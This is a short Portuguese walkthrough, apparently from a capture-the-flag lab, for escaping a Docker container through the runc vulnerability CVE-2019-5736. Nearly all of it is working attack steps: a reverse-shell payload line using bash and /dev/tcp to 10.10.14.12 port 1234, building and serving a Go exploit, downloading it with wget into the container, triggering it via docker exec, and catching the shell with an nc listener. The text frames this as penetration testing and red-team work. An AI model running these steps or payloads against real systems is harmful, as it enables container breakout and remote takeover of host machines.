
Exploit baseado em Go para CVE-2019-5736 (escape de contêiner Runc) com payload de reverse shell personalizável, projetado para testes de penetração e operações de red team contra contêineres Docker vulneráveis.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
a máquina é vulnerável ao CVE-2019-5736, siga os passos do exploit do Runc (CVE-2019-5736). Baixe o arquivo main.go, altere o payload no arquivo para:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
Depois disso, execute:
go build main.go
Hospede um servidor http :
python3 -m http.server

Em seguida, abra 3 terminais conforme abaixo :

Terminal 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
Terminal 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
Terminal 3
nc -nlvp 1234
assim que você executar o ./main no primeiro terminal ssh, execute imediatamente o segundo comando no segundo terminal ssh; então você obterá o shell reverso do netcat no terminal 3

